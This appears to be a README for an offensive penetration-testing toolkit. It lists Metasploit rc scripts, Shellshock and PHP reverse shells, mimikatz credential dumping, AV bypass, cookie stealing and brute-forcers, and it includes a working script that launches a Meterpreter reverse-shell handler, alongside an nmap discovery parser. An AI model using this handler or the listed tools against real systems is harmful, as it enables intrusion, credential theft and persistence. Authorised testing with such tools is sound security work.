pentesting_tools

Yuriy Stanchev - Penetration testing tools. For educational purposes only; use at your own risk.

Structure

Here are some common scripts - for the full list check the repository. Edit them to suit your needs. As a start, for the rc scripts set the IPs and change the ports if needed.
Check the repository: Penetration Testing Tools
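The rc scripts need LHOST/LPORT set per engagement. The script below is an added example, not one of the repository's files: instead of editing an rc file by hand it generates a Meterpreter reverse-handler resource script from parameters, validates the port, and (only when run with arguments) launches msfconsole with it. The file name gen_handler_rc.sh, the default payload windows/meterpreter/reverse_tcp and the assumption that msfconsole is on PATH are all this example's own choices.

```shell
#!/bin/sh
# gen_handler_rc.sh - added example, not one of the repository's scripts.
# Builds a Metasploit resource (rc) file for a reverse Meterpreter handler
# from parameters instead of hard-coding LHOST/LPORT in the rc itself, so
# the same script works on every engagement after "setting IPs and ports".

# gen_handler_rc LHOST [LPORT] [PAYLOAD]
# Prints the rc script on stdout; returns 1 on bad input.
gen_handler_rc() {
    lhost="$1"
    lport="${2:-4444}"                               # default port, assumption
    payload="${3:-windows/meterpreter/reverse_tcp}"  # default payload, assumption

    if [ -z "$lhost" ]; then
        echo "gen_handler_rc: LHOST is required" >&2
        return 1
    fi
    # Reject a non-numeric or out-of-range port before msfconsole sees it.
    case "$lport" in
        ''|*[!0-9]*) echo "gen_handler_rc: LPORT must be numeric: '$lport'" >&2; return 1 ;;
    esac
    if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
        echo "gen_handler_rc: LPORT out of range: $lport" >&2
        return 1
    fi

    # ExitOnSession false plus "exploit -j -z" keeps the handler running as a
    # background job, so one listener catches several callbacks.
    printf '%s\n' \
        "use exploit/multi/handler" \
        "set PAYLOAD $payload" \
        "set LHOST $lhost" \
        "set LPORT $lport" \
        "set ExitOnSession false" \
        "exploit -j -z"
}

# Usage: ./gen_handler_rc.sh 10.0.0.5 443 [payload]
# Writes handler.rc and starts msfconsole with it (msfconsole must be on PATH).
if [ "$#" -ge 1 ]; then
    gen_handler_rc "$@" > handler.rc || exit 1
    msfconsole -q -r handler.rc
fi
```

The same pattern (a function that prints the rc, a guard that only runs msfconsole when arguments are given) applies to the bind, browser and psexec scripts in this directory; the validation step matters because msfconsole will happily start a handler on a typo'd port and the callback simply never arrives.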
metasploit_rc_scripts - contains sample rc files for exploitation, or Perl scripts that generate them.
|- aurora.rc - exploitation of the Aurora vulnerability
|- autoroute.rc - autorouting example
|- aux_scan.rc - port scanning
|- av* - AV bypass
|- bind* - bind payloads
|- browser-* - browser payloads
|- dir_list.rc - HTTP directory listing
|- http_nix.pl - *nix HTTP exploit brute-forcer
|- iis.pl - IIS exploit brute-forcer
|- java* - Java payloads
|- mimi.rc - mimikatz (credential dumping)
|- nessus.rc - load Nessus scan results for further exploitation; if in doubt, list the reports first, then edit and execute.
|- nessus_db_init.sh - initialize PostgreSQL for use with Metasploit
|- netapi_smb.pl - generates a NetAPI rc script to brute-force vulnerabilities
|- pdf* - PDF payloads
|- persistance-sticky.rc - persistence through sticky keys
|- priv* - Windows privilege escalation techniques
|- psexec.rc - psexec with pass-the-hash
|- rc_revphp.rc - PHP reverse shell handler
|- rdp_ena.rc - enable RDP
|- relay_port.rc - relay a port
|- reverse_rc - Meterpreter reverse handler
|- smb_enum* - Windows SMB enumeration scripts
|- smb_psexec* - Windows SMB brute-force and psexec
|- smb_relay* - SMB relay attack
|- smb_win_brute.pl - Windows SMB brute-force
|- spool.rc - MS10-061 - Microsoft print spooler service vulnerability
|- ssh* - SSH rc scripts
|- stage__inclusion - PHP file inclusion scripts
|- svc_priv_* - Windows service privilege escalation
|- samba-nix.pl - Linux Samba vulnerabilities brute-forcer
|- ms10_046.rc - browser shortcut icon exploitation
|- telnet.rc - telnet brute-force
|- win_post.rc - Windows post-exploitation
|- wpnix.pl - WordPress exploit brute-forcer
nmap_scans - ready-to-use nmap scans.
|- discover_hosts.sh - basic host discovery
|- netenum.sh - somewhat more extended host discovery and basic tests
|- nfs_ls.sh - NFS listing
|- nmap.sh - various standard scans
|- nmap_ftp_scan.sh - FTP NSE scripts
|- nmap_http_scan.sh - HTTP vulnerabilities
|- nmap_http_scan_proxy.sh - the same scan through a proxy to the target; customize for Burp and OWASP ZAP.
|- nmap_mssql_scan.sh - NSE checks on MS SQL
|- nmap_mysql_scan.sh - NSE checks on MySQL
|- nmap_smb_scan.sh - NSE checks on Windows, plus enum4linux, nbtscan, nmblookup
|- nmap_smtp_scan.sh - NSE checks for SMTP
|- osfingerprint.sh - SYN, service version and OS scan
|- static_nmap.sh - statically compile nmap
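The discovery scripts above feed the service-specific scans that follow them. As an added example (not one of the repository's scripts), the wrapper below runs an nmap ping sweep in grepable format and parses that output into plain one-host-per-line lists: live hosts, and hosts with a given port open, which is what an SMB or MySQL scan wants as its target file. The script name discover_live.sh, the output file live_hosts.txt and the embedded sample output are this example's own; the sample is constructed, not captured from a real scan.

```shell
#!/bin/sh
# discover_live.sh - added example, not one of the repository's scripts.
# Wraps an nmap ping sweep and turns nmap's grepable (-oG) output into plain
# target lists, so follow-up scripts (service scans, SMB enumeration) can
# read one host per line instead of re-parsing nmap themselves.

# Read nmap -oG output on stdin; print every host nmap reported as Up.
live_hosts_from_grepable() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# Read nmap -oG output on stdin; print hosts with the given port open.
# In the Ports field every entry is preceded by a space, e.g.
# " 445/open/tcp//microsoft-ds///", which is what the index() match relies on
# (so port 2 does not match 22).
hosts_with_open_port() {
    awk -v port="$1" '/^Host:/ && index($0, " " port "/open/") { print $2 }'
}

# Ping sweep of a range. -sn: no port scan, -n: no DNS, -oG -: grepable to stdout.
# Needs nmap on PATH and, for ARP/raw ICMP probes, normally root.
discover_hosts() {
    nmap -sn -n -oG - "$1" | live_hosts_from_grepable
}

# Constructed sample of grepable output (status lines plus a small port scan)
# so the parsers can be exercised offline; real nmap separates fields with tabs.
SAMPLE_GREPABLE='# Nmap 7.94 scan initiated as: nmap -n -oG - -p 22,445 10.0.0.0/29
Host: 10.0.0.1 ()  Status: Up
Host: 10.0.0.1 ()  Ports: 22/open/tcp//ssh//OpenSSH 8.9//, 445/open/tcp//microsoft-ds///  Ignored State: closed (998)
Host: 10.0.0.3 ()  Status: Up
Host: 10.0.0.3 ()  Ports: 22/closed/tcp//ssh///, 445/filtered/tcp//microsoft-ds///
Host: 10.0.0.4 ()  Status: Down
# Nmap done -- 8 IP addresses (2 hosts up) scanned in 1.02 seconds'

# Run the parsers over the constructed sample (no network needed).
sample_live_hosts() {
    printf '%s\n' "$SAMPLE_GREPABLE" | live_hosts_from_grepable
}

sample_hosts_with_port() {
    printf '%s\n' "$SAMPLE_GREPABLE" | hosts_with_open_port "$1"
}

# Usage: ./discover_live.sh 10.0.0.0/24  -> live hosts on stdout and in live_hosts.txt
if [ "$#" -ge 1 ]; then
    discover_hosts "$1" | tee live_hosts.txt
fi
```

Chain it with a port scan of the discovered hosts (nmap -p 445 -oG - -iL live_hosts.txt | hosts_with_open_port 445) to produce the target list for the SMB scripts; parsing -oG rather than normal output keeps the scripts stable across nmap versions, since the grepable format is the one nmap documents for this purpose.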
other_scans - scripts that can be used for scanning if nothing else is available.
|- afhn_ping_tr.sh - traceroute, arping, fping, hping, nping, ping
|- brute_ssh_telnet.sh - telnet and SSH brute-forcer; modify as needed
|- http_scan.sh - various HTTP scans; modify as needed
|- http_scan_proxy.sh - the same through a proxy to the target
|- hydra_form_brute.sh - HTTP form brute-force with hydra
|- nc_scan.sh - port scan with nc
|- ping.sh - range ping
|- ping_scan.bat - the same on Windows
|- pingscan.ps1 - the same with PowerShell
|- sql_map.sh - guided union-based SQL injection
|- unicorns_amap.sh - unicornscan and amap port scan
post - post-exploitation.
|- access.sh - check access logs
|- addusr.bat - add a local and a domain user
|- all_info.bat - gather information for privilege escalation
|- badsql.sh - exploitation of MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22
|- get_description_ad.ps1 - AD account description
|- netview.bat - list domains, domain users, admins etc.
|- windows-post-exploitation.sh - pass-the-hash post-exploitation
privilege_escalation - documents and tools on privilege escalation
research_exploits - some Windows exploits
shellshock - scripts that make use of the Shellshock vulnerability.
|- bind_shellshock - open a bind shell
|- read_file_shellshock - read a file
|- reverse_shellshock - reverse shell
|- reverse_shellshock_proxy - reverse shell through a proxy to the target
tools - other tools.
|- arp* - ARP poisoning
|- dns* - DNS enumerators
|- cookie* - cookie stealing
|- curdir.php.txt - get the current directory
|- dir.php.txt - list /
|- passwd.php.txt - read passwd
|- php-reverse-shell* - pentestmonkey's PHP reverse shell: as .php, as .txt for RFI, and as .gif
|- dirtr_tool.pl - simple directory traversal tool
|- harvester.pl - harvesting
|- snmpwalk.pl - SNMP enumeration
|- venomous.pl - various tests to bypass AVs with msfvenom
|- win_kracks.pl - run ncrack against RDP on multiple hosts
|- write_file.txt - PHP write-file examples

If you have any questions, ask at iuri.stanchev@gmail.com